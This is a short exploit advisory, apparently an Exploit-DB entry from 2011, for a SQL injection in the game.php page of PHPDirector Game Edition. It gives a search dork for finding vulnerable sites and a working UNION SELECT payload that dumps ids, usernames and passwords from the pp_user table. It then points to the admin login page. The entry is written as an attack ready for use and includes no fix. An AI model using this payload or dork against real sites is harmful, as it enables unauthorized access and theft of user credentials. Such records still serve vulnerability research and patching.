PHPDirector Game Edition - 'game.php' SQL Injection

EDB-ID:

16047

CVE:

N/A




Platform:

PHP

Date:

2011-01-26


PHPDirector Game Edition (game.php) Sql Injection Vulnerability
================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://scriptsgratuits.info/Scripts/PHP/Jeux/PHPDirector-Game-Edition_7.html
.:. Dork           : "Powered by PHPD Game Edition"
.:. Home           : www.Hack-Book.com
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [ZaIdOoHxHaCkEr] & [The Sword]

####################################################################

===[ Exploit ]===

www.site.com/games.php?id=null[Sql Injection]

www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user

===[ Admin Panel ]===

www.site.com/admin/login.php


####################################################################